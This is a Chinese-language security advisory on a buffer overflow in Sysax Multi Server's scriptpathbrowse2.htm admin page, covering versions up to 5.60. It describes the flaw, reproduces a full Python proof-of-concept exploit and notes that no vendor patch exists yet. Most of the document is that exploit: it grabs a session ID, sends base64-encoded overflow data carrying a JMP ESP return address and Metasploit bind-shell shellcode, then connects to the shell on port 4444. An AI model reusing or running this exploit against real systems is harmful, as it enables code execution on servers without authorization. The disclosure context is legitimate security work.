Sysax Multi Server 'scriptpathbrowse2.htm'缓冲区溢出漏洞


发布日期:2012-06-19
更新日期:2012-06-29

受影响系统:
Codeorigin Sysax Multi Server 5.60
Codeorigin Sysax Multi Server 5.57
Codeorigin Sysax Multi Server 5.55
Codeorigin Sysax Multi Server 5.53
Codeorigin Sysax Multi Server 5.52
Codeorigin Sysax Multi Server 5.50
Codeorigin Sysax Multi Server 5.25
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54094

Sysax Multi Server是Windows平台下的SSH2和FTP服务器。

Sysax Multi Server 5.62之前版本在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码。

<*来源:Craig Freyman
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Craig Freyman ()提供了如下测试方法:


#!/usr/bin/python
##########################################################################################################
#Title: Sysax <= 5.62 Admin Interface Local Buffer Overflow
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit
#Date Discovered: June 15, 2012
#Vendor Contacted: June 19, 2012
#Details: http://www.pwnag3.com/2012/06/sysax-admin-interface-local-priv.html
##########################################################################################################

import socket,sys,time,re,base64,subprocess

def main():
  global login
  print "\n"
  print "****************************************************************************"
  print "        Sysax <= 5.62 Admin Interface Local Buffer Overflow                 "
  print "                    by @cd1zz www.pwnag3.com                              "
  print "****************************************************************************"

  #initial GET
  login = "GET /scgi? HTTP/1.1\r\n"
  login +="Host: localhost:88\r\n"
  login += "Referer: http://localhost:88\r\n\r\n"

  try:
    r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    r.connect((target, port))
    print "[+] Accessing admin interface"
    r.send(login)
  except Exception, e:
    print "[-] There was a problem"
    print e
 
  #loop the recv sock so we get the full page
  page = '' 
  fullpage = '' 
  while "</html>" not in fullpage:
    page = r.recv(4096)
    fullpage += page
  time.sleep(1)

  #regex the sid from the page
  global sid
  sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
  if sid is None:
    print "[-] There was a problem finding your SID"
    sys.exit(1)
  time.sleep(1)
  r.close()

def exploit():
  #msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
  shell = (
  "\xdb\xd5\xd9\x74\x24\xf4\xb8\xc3\x8f\xb3\x3e\x5b\x33\xc9"
  "\xb1\x56\x31\x43\x18\x03\x43\x18\x83\xeb\x3f\x6d\x46\xc2"
  "\x57\xfb\xa9\x3b\xa7\x9c\x20\xde\x96\x8e\x57\xaa\x8a\x1e"
  "\x13\xfe\x26\xd4\x71\xeb\xbd\x98\x5d\x1c\x76\x16\xb8\x13"
  "\x87\x96\x04\xff\x4b\xb8\xf8\x02\x9f\x1a\xc0\xcc\xd2\x5b"
  "\x05\x30\x1c\x09\xde\x3e\x8e\xbe\x6b\x02\x12\xbe\xbb\x08"
  "\x2a\xb8\xbe\xcf\xde\x72\xc0\x1f\x4e\x08\x8a\x87\xe5\x56"
  "\x2b\xb9\x2a\x85\x17\xf0\x47\x7e\xe3\x03\x81\x4e\x0c\x32"
  "\xed\x1d\x33\xfa\xe0\x5c\x73\x3d\x1a\x2b\x8f\x3d\xa7\x2c"
  "\x54\x3f\x73\xb8\x49\xe7\xf0\x1a\xaa\x19\xd5\xfd\x39\x15"
  "\x92\x8a\x66\x3a\x25\x5e\x1d\x46\xae\x61\xf2\xce\xf4\x45"
  "\xd6\x8b\xaf\xe4\x4f\x76\x1e\x18\x8f\xde\xff\xbc\xdb\xcd"
  "\x14\xc6\x81\x99\xd9\xf5\x39\x5a\x75\x8d\x4a\x68\xda\x25"
  "\xc5\xc0\x93\xe3\x12\x26\x8e\x54\x8c\xd9\x30\xa5\x84\x1d"
  "\x64\xf5\xbe\xb4\x04\x9e\x3e\x38\xd1\x31\x6f\x96\x89\xf1"
  "\xdf\x56\x79\x9a\x35\x59\xa6\xba\x35\xb3\xd1\xfc\xfb\xe7"
  "\xb2\x6a\xfe\x17\x25\x37\x77\xf1\x2f\xd7\xd1\xa9\xc7\x15"
  "\x06\x62\x70\x65\x6c\xde\x29\xf1\x38\x08\xed\xfe\xb8\x1e"
  "\x5e\x52\x10\xc9\x14\xb8\xa5\xe8\x2b\x95\x8d\x63\x14\x7e"
  "\x47\x1a\xd7\x1e\x58\x37\x8f\x83\xcb\xdc\x4f\xcd\xf7\x4a"
  "\x18\x9a\xc6\x82\xcc\x36\x70\x3d\xf2\xca\xe4\x06\xb6\x10"
  "\xd5\x89\x37\xd4\x61\xae\x27\x20\x69\xea\x13\xfc\x3c\xa4"
  "\xcd\xba\x96\x06\xa7\x14\x44\xc1\x2f\xe0\xa6\xd2\x29\xed"
  "\xe2\xa4\xd5\x5c\x5b\xf1\xea\x51\x0b\xf5\x93\x8f\xab\xfa"
  "\x4e\x14\xdb\xb0\xd2\x3d\x74\x1d\x87\x7f\x19\x9e\x72\x43"
  "\x24\x1d\x76\x3c\xd3\x3d\xf3\x39\x9f\xf9\xe8\x33\xb0\x6f"
  "\x0e\xe7\xb1\xa5")
 
  nops = "\x90" * 20
  #7CA7A787 FFE4 JMP ESP shell32.dll v6.00.2900.6072
  jmp_esp = "\x87\xA7\xA7\x7C"
  payload = base64.b64encode(("A" * 392 + jmp_esp + nops + shell + nops))
 
  #setup exploit
  exploit = "POST /scgi?"+str(sid.group(0))+"&pid=scriptpathbrowse2.htm HTTP/1.1\r\n"
  exploit += "Host: localhost:88\r\n"
  exploit += "Content-Type: application/x-www-form-urlencoded\r\n"
  exploit += "Content-Length: "+ str(len(payload)+3)+"\r\n\r\n"
  exploit += "e2="+payload+"\r\n\r\n"

  try:
    r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    r.connect((target, port))
    print "[+] Sending pwnag3"
    r.send(exploit)
  except Exception, e:
    print "[-] There was a problem"
    print e
  time.sleep(2)
  print "[+] Here is your shell..."
  subprocess.Popen("telnet localhost 4444", shell=True).wait()
  sys.exit(1)

if __name__ == '__main__':
  if len(sys.argv) != 1:
    print "[-] Usage: %s"
    sys.exit(1)
 
  #by default it binds to 127.0.0.1 on 88
  target = "127.0.0.1"
  port = 88
  main()
  exploit()

建议:
--------------------------------------------------------------------------------
厂商补丁:

Codeorigin
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ftpshell.com/index.htm

相关内容